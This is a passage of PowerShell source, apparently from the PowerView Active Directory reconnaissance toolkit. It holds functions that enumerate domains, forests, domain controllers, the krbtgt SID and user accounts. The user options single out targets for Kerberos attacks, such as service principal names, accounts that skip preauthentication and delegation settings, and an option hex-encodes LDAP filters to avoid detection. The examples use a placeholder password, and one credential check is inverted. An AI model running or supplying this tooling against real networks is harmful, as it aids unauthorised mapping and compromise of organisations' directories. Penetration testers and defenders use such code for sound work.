'[Get-Domain] Using alternate credentials for Get-Domain'\n\n            if ($PSBoundParameters['Domain']) {\n                $TargetDomain = $Domain\n            }\n            else {\n                # if no domain is supplied, extract the logon domain from the PSCredential passed\n                $TargetDomain = $Credential.GetNetworkCredential().Domain\n                Write-Verbose \"[Get-Domain] Extracted domain '$TargetDomain' from -Credential\"\n            }\n\n            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password)\n\n            try {\n                [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)\n            }\n            catch {\n                Write-Verbose \"[Get-Domain] The specified domain '$TargetDomain' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_\"\n            }\n        }\n        elseif ($PSBoundParameters['Domain']) {\n            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)\n            try {\n                [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)\n            }\n            catch {\n                Write-Verbose \"[Get-Domain] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_\"\n            }\n        }\n        else {\n            try {\n                [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n            }\n            catch {\n                Write-Verbose \"[Get-Domain] Error retrieving the current domain: $_\"\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainController {\n<#\n.SYNOPSIS\n\nReturn the domain controllers for the current (or specified) domain.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainComputer, Get-Domain  \n\n.DESCRIPTION\n\nEnumerates the domain controllers for the current or specified domain.\nBy default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer\nto search for domain controllers.\n\n.PARAMETER Domain\n\nThe domain to query for domain controllers, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER LDAP\n\nSwitch. Use LDAP queries to determine the domain controllers instead of built in .NET methods.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.EXAMPLE\n\nGet-DomainController -Domain 'test.local'\n\nDetermine the domain controllers for 'test.local'.\n\n.EXAMPLE\n\nGet-DomainController -Domain 'test.local' -LDAP\n\nDetermine the domain controllers for 'test.local' using LDAP queries.\n\n.EXAMPLE\n\n'test.local' | Get-DomainController\n\nDetermine the domain controllers for 'test.local'.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainController -Credential $Cred\n\n.OUTPUTS\n\nPowerView.Computer\n\nOutputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.\n\nSystem.DirectoryServices.ActiveDirectory.DomainController\n\nIf -LDAP isn't specified.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.Computer')]\n    [OutputType('System.DirectoryServices.ActiveDirectory.DomainController')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Switch]\n        $LDAP,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL\n    )\n\n    PROCESS {\n        $Arguments = @{}\n        if ($PSBoundParameters['Domain']) { $Arguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $Arguments['SSL'] = $SSL }\n\n        if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) {\n            if ($PSBoundParameters['Server']) { $Arguments['Server'] = $Server }\n\n            # UAC specification for domain controllers\n            $Arguments['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)'\n\n            Get-DomainComputer @Arguments\n        }\n        else {\n            $FoundDomain = Get-Domain @Arguments\n            if ($FoundDomain) {\n                $FoundDomain.DomainControllers\n            }\n        }\n    }\n}\n\n\nfunction Get-Forest {\n<#\n.SYNOPSIS\n\nReturns the forest object for the current (or specified) forest.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: ConvertTo-SID  \n\n.DESCRIPTION\n\nReturns a System.DirectoryServices.ActiveDirectory.Forest object for the current\nforest or the forest specified with -Forest X.\n\n.PARAMETER Forest\n\nThe forest name to query for, defaults to the current forest.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target forest.\n\n.EXAMPLE\n\nGet-Forest -Forest external.domain\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-Forest -Credential $Cred\n\n.OUTPUTS\n\nSystem.Management.Automation.PSCustomObject\n\nOutputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition\nto the forest root domain SID.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('System.Management.Automation.PSCustomObject')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Forest,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        if ($PSBoundParameters['Credential']) {\n\n            Write-Verbose \"[Get-Forest] Using alternate credentials for Get-Forest\"\n\n            if ($PSBoundParameters['Forest']) {\n                $TargetForest = $Forest\n            }\n            else {\n                # if no domain is supplied, extract the logon domain from the PSCredential passed\n                $TargetForest = $Credential.GetNetworkCredential().Domain\n                Write-Verbose \"[Get-Forest] Extracted domain '$Forest' from -Credential\"\n            }\n\n            $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $TargetForest, $Credential.UserName, $Credential.GetNetworkCredential().Password)\n\n            try {\n                $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)\n            }\n            catch {\n                Write-Verbose \"[Get-Forest] The specified forest '$TargetForest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_\"\n                $Null\n            }\n        }\n        elseif ($PSBoundParameters['Forest']) {\n            $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest)\n            try {\n                $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext)\n            }\n            catch {\n                Write-Verbose \"[Get-Forest] The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust: $_\"\n                return $Null\n            }\n        }\n        else {\n            # otherwise use the current forest\n            $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()\n        }\n\n        if ($ForestObject) {\n            # get the SID of the forest root\n            if ($PSBoundParameters['Credential']) {\n                $ForestSid = (Get-DomainUser -Identity \"krbtgt\" -Domain $ForestObject.RootDomain.Name -Credential $Credential).objectsid\n            }\n            else {\n                $ForestSid = (Get-DomainUser -Identity \"krbtgt\" -Domain $ForestObject.RootDomain.Name).objectsid\n            }\n\n            $Parts = $ForestSid -Split '-'\n            $ForestSid = $Parts[0..$($Parts.length-2)] -join '-'\n            $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid\n            $ForestObject\n        }\n    }\n}\n\n\nfunction Get-ForestDomain {\n<#\n.SYNOPSIS\n\nReturn all domains for the current (or specified) forest.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Forest  \n\n.DESCRIPTION\n\nReturns all domains for the current forest or the forest specified\nby -Forest X.\n\n.PARAMETER Forest\n\nSpecifies the forest name to query for domains.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target forest.\n\n.EXAMPLE\n\nGet-ForestDomain\n\n.EXAMPLE\n\nGet-ForestDomain -Forest external.local\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-ForestDomain -Credential $Cred\n\n.OUTPUTS\n\nSystem.DirectoryServices.ActiveDirectory.Domain\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('System.DirectoryServices.ActiveDirectory.Domain')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Forest,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        $Arguments = @{}\n        if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }\n        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }\n\n        $ForestObject = Get-Forest @Arguments\n        if ($ForestObject) {\n            $ForestObject.Domains\n        }\n    }\n}\n\n\nfunction Get-ForestGlobalCatalog {\n<#\n.SYNOPSIS\n\nReturn all global catalogs for the current (or specified) forest.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Forest  \n\n.DESCRIPTION\n\nReturns all global catalogs for the current forest or the forest specified\nby -Forest X by using Get-Forest to retrieve the specified forest object\nand the .FindAllGlobalCatalogs() to enumerate the global catalogs.\n\n.PARAMETER Forest\n\nSpecifies the forest name to query for global catalogs.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-ForestGlobalCatalog\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-ForestGlobalCatalog -Credential $Cred\n\n.OUTPUTS\n\nSystem.DirectoryServices.ActiveDirectory.GlobalCatalog\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Forest,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        $Arguments = @{}\n        if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }\n        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }\n\n        $ForestObject = Get-Forest @Arguments\n\n        if ($ForestObject) {\n            $ForestObject.FindAllGlobalCatalogs()\n        }\n    }\n}\n\n\nfunction Get-ForestSchemaClass {\n<#\n.SYNOPSIS\n\nHelper that returns the Active Directory schema classes for the current\n(or specified) forest or returns just the schema class specified by\n-ClassName X.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Forest  \n\n.DESCRIPTION\n\nUses Get-Forest to retrieve the current (or specified) forest. By default,\nthe .FindAllClasses() method is executed, returning a collection of\n[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] results.\nIf \"-FindClass X\" is specified, the [DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]\nresult for the specified class name is returned.\n\n.PARAMETER ClassName\n\nSpecifies a ActiveDirectorySchemaClass name in the found schema to return.\n\n.PARAMETER Forest\n\nThe forest to query for the schema, defaults to the current forest.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nGet-ForestSchemaClass\n\nReturns all domain schema classes for the current forest.\n\n.EXAMPLE\n\nGet-ForestSchemaClass -Forest dev.testlab.local\n\nReturns all domain schema classes for the external.local forest.\n\n.EXAMPLE\n\nGet-ForestSchemaClass -ClassName user -Forest external.local\n\nReturns the user schema class for the external.local domain.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-ForestSchemaClass -ClassName user -Forest external.local -Credential $Cred\n\nReturns the user schema class for the external.local domain using\nthe specified alternate credentials.\n\n.OUTPUTS\n\n[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass]\n\nAn ActiveDirectorySchemaClass returned from the found schema.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True)]\n        [Alias('Class')]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ClassName,\n\n        [Alias('Name')]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Forest,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    PROCESS {\n        $Arguments = @{}\n        if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest }\n        if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential }\n\n        $ForestObject = Get-Forest @Arguments\n\n        if ($ForestObject) {\n            if ($PSBoundParameters['ClassName']) {\n                ForEach ($TargetClass in $ClassName) {\n                    $ForestObject.Schema.FindClass($TargetClass)\n                }\n            }\n            else {\n                $ForestObject.Schema.FindAllClasses()\n            }\n        }\n    }\n}\n\n\nfunction Find-DomainObjectPropertyOutlier {\n<#\n.SYNOPSIS\n\nFinds user/group/computer objects in AD that have 'outlier' properties set.\n\nAuthor: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer\n\n.DESCRIPTION\n\nA 'reference' set of property names is calculated, either from a standard set preserved\nfor user/group/computers, or from the array of names passed to -ReferencePropertySet, or\nfrom the property names of the passed -ReferenceObject. Every user/group/computer object\n(depending on determined class) are enumerated, and for each object, if the object has a\n'non-standard' property set (meaning a property not held by the reference set), the object's\nsamAccountName, property name, and property value are output to the pipeline.\n\n.PARAMETER ClassName\n\nSpecifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.\nIf -ReferenceObject is specified, this will be automatically extracted, if possible.\n\n.PARAMETER ReferencePropertySet\n\nSpecifies an array of property names to diff against the class schema.\n\n.PARAMETER ReferenceObject\n\nSpecicifes the PowerView user/group/computer object to extract property names\nfrom to use as the reference set.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nFind-DomainObjectPropertyOutlier -ClassName 'User'\n\nEnumerates users in the current domain with 'outlier' properties filled in.\n\n.EXAMPLE\n\nFind-DomainObjectPropertyOutlier -ClassName 'Group' -Domain external.local\n\nEnumerates groups in the external.local forest/domain with 'outlier' properties filled in.\n\n.EXAMPLE\n\nGet-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier\n\nEnumerates computers in the current domain with 'outlier' properties filled in.\n\n.OUTPUTS\n\nPowerView.PropertyOutlier\n\nCustom PSObject with translated object property outliers.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.PropertyOutlier')]\n    [CmdletBinding(DefaultParameterSetName = 'ClassName')]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')]\n        [Alias('Class')]\n        [ValidateSet('User', 'Group', 'Computer')]\n        [String]\n        $ClassName,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $ReferencePropertySet,\n\n        [Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')]\n        [PSCustomObject]\n        $ReferenceObject,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $UserReferencePropertySet = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated')\n\n        $GroupReferencePropertySet = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated')\n\n        $ComputerReferencePropertySet = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated')\n\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n        # Domain / Credential\n        if ($PSBoundParameters['Domain']) {\n            if ($PSBoundParameters['Credential']) {\n                $TargetForest = Get-Domain -Domain $Domain | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name\n            }\n            else {\n                $TargetForest = Get-Domain -Domain $Domain -Credential $Credential | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name\n            }\n            Write-Verbose \"[Find-DomainObjectPropertyOutlier] Enumerated forest '$TargetForest' for target domain '$Domain'\"\n        }\n\n        $SchemaArguments = @{}\n        if ($PSBoundParameters['Credential']) { $SchemaArguments['Credential'] = $Credential }\n        if ($TargetForest) {\n            $SchemaArguments['Forest'] = $TargetForest\n        }\n    }\n\n    PROCESS {\n\n        if ($PSBoundParameters['ReferencePropertySet']) {\n            Write-Verbose \"[Find-DomainObjectPropertyOutlier] Using specified -ReferencePropertySet\"\n            $ReferenceObjectProperties = $ReferencePropertySet\n        }\n        elseif ($PSBoundParameters['ReferenceObject']) {\n            Write-Verbose \"[Find-DomainObjectPropertyOutlier] Extracting property names from -ReferenceObject to use as the reference property set\"\n            $ReferenceObjectProperties = Get-Member -InputObject $ReferenceObject -MemberType NoteProperty | Select-Object -Expand Name\n            $ReferenceObjectClass = $ReferenceObject.objectclass | Select-Object -Last 1\n            Write-Verbose \"[Find-DomainObjectPropertyOutlier] Calculated ReferenceObjectClass : $ReferenceObjectClass\"\n        }\n        else {\n            Write-Verbose \"[Find-DomainObjectPropertyOutlier] Using the default reference property set for the object class '$ClassName'\"\n        }\n\n        if (($ClassName -eq 'User') -or ($ReferenceObjectClass -eq 'User')) {\n            $Objects = Get-DomainUser @SearcherArguments\n            if (-not $ReferenceObjectProperties) {\n                $ReferenceObjectProperties = $UserReferencePropertySet\n            }\n        }\n        elseif (($ClassName -eq 'Group') -or ($ReferenceObjectClass -eq 'Group')) {\n            $Objects = Get-DomainGroup @SearcherArguments\n            if (-not $ReferenceObjectProperties) {\n                $ReferenceObjectProperties = $GroupReferencePropertySet\n            }\n        }\n        elseif (($ClassName -eq 'Computer') -or ($ReferenceObjectClass -eq 'Computer')) {\n            $Objects = Get-DomainComputer @SearcherArguments\n            if (-not $ReferenceObjectProperties) {\n                $ReferenceObjectProperties = $ComputerReferencePropertySet\n            }\n        }\n        else {\n            throw \"[Find-DomainObjectPropertyOutlier] Invalid class: $ClassName\"\n        }\n\n        ForEach ($Object in $Objects) {\n            $ObjectProperties = Get-Member -InputObject $Object -MemberType NoteProperty | Select-Object -Expand Name\n            ForEach($ObjectProperty in $ObjectProperties) {\n                if ($ReferenceObjectProperties -NotContains $ObjectProperty) {\n                    $Out = New-Object PSObject\n                    $Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName\n                    $Out | Add-Member Noteproperty 'Property' $ObjectProperty\n                    $Out | Add-Member Noteproperty 'Value' $Object.$ObjectProperty\n                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier')\n                    $Out\n                }\n            }\n        }\n    }\n}\n\n\n########################################################\n#\n# \"net *\" replacements and other fun start below\n#\n########################################################\n\nfunction Get-DomainUser {\n<#\n.SYNOPSIS\n\nReturn all users or specific user objects in AD.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty  \n\n.DESCRIPTION\n\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\nLDAP filter based on targeting/filter parameters, and searches for all objects\nmatching the criteria. To only return specific properties, use\n\"-Properties samaccountname,usnchanged,...\". By default, all user objects for\nthe current domain are returned.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted. Also accepts DOMAIN\\user format.\n\n.PARAMETER SPN\n\nSwitch. Only return user objects with non-null service principal names.\n\n.PARAMETER UACFilter\n\nDynamic parameter that accepts one or more values from $UACEnum, including\n\"NOT_X\" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.\n\n.PARAMETER AdminCount\n\nSwitch. Return users with '(adminCount=1)' (meaning are/were privileged).\n\n.PARAMETER Enabled\n\nSwitch. Return users that are currently enabled.\n\n.PARAMETER Disabled\n\nSwitch. Return users that are currently disabled.\n\n.PARAMETER Locked\n\nSwitch. Return users that are currently locked.\n\n.PARAMETER Unlocked\n\nSwitch. Return users that are currently unlocked.\n\n.PARAMETER PassExired\n\nSwitch. Return users whose password has expired.\n\n.PARAMETER PassNotExpired\n\nSwitch. Return users whose password has not expired.\n\n.PARAMETER AllowDelegation\n\nSwitch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'\n\n.PARAMETER DisallowDelegation\n\nSwitch. Return user accounts that are marked as 'sensitive and not allowed for delegation'\n\n.PARAMETER NoPassExpiry\n\nSwitch. Return users whose passwords do not expire.\n\n.PARAMETER Unconstrained\n\nSwitch. Return users configured for unconstrained delegation.\n\n.PARAMETER TrustedToAuth\n\nSwitch. Return user accounts that are trusted to authenticate for other principals.\n\n.PARAMETER RBCD\n\nSwitch. Return user accounts that are configured to allow resource-based constrained delegation.\n\n.PARAMETER PreauthNotRequired\n\nSwitch. Return user accounts with \"Do not require Kerberos preauthentication\" set.\n\n.PARAMETER PassNotRequired\n\nSwitch. Return user accounts with PASSWD_NOTREQD set.\n\n.PARAMETER PassLastSet\n\nReturn only user accounts that have not had a password change for at least the specified number of days.\n\n.PARAMETER Owner\n\nReturn the owner information of the user object.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER Properties\n\nSpecifies the properties of the output object to retrieve from the server.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER SecurityMasks\n\nSpecifies an option for examining security information of a directory object.\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER FindOne\n\nOnly return one result object.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Raw\n\nSwitch. Return raw results instead of translating the fields into a custom PSObject.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainUser -Domain testlab.local\n\nReturn all users for the testlab.local domain\n\n.EXAMPLE\n\nGet-DomainUser \"S-1-5-21-890171859-3433809279-3366196753-1108\",\"administrator\"\n\nReturn the user with the given SID, as well as Administrator.\n\n.EXAMPLE\n\n'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff\n\nlastlogoff                                   samaccountname\n----------                                   --------------\n12/31/1600 4:00:00 PM                        dfm.a\n12/31/1600 4:00:00 PM                        dfm\n12/31/1600 4:00:00 PM                        harmj0y\n12/31/1600 4:00:00 PM                        Administrator\n\n.EXAMPLE\n\nGet-DomainUser -SearchBase \"LDAP://OU=secret,DC=testlab,DC=local\" -AdminCount -AllowDelegation\n\nSearch the specified OU for privileged user (AdminCount = 1) that allow delegation\n\n.EXAMPLE\n\nGet-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon\n\nSearch for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon\n\n.EXAMPLE\n\nGet-DomainUser -UACFilter DONT_REQ_PREAUTH,NOT_PASSWORD_EXPIRED\n\nFind users who doesn't require Kerberos preauthentication and DON'T have an expired password.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainUser -Credential $Cred\n\n.EXAMPLE\n\nGet-Domain | Select-Object -Expand name\ntestlab.local\n\nGet-DomainUser dev\\user1 -Verbose -Properties distinguishedname\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\nVERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=user1)))\n\ndistinguishedname\n-----------------\nCN=user1,CN=Users,DC=dev,DC=testlab,DC=local\n\n.INPUTS\n\nString\n\n.OUTPUTS\n\nPowerView.User\n\nCustom PSObject with translated user property 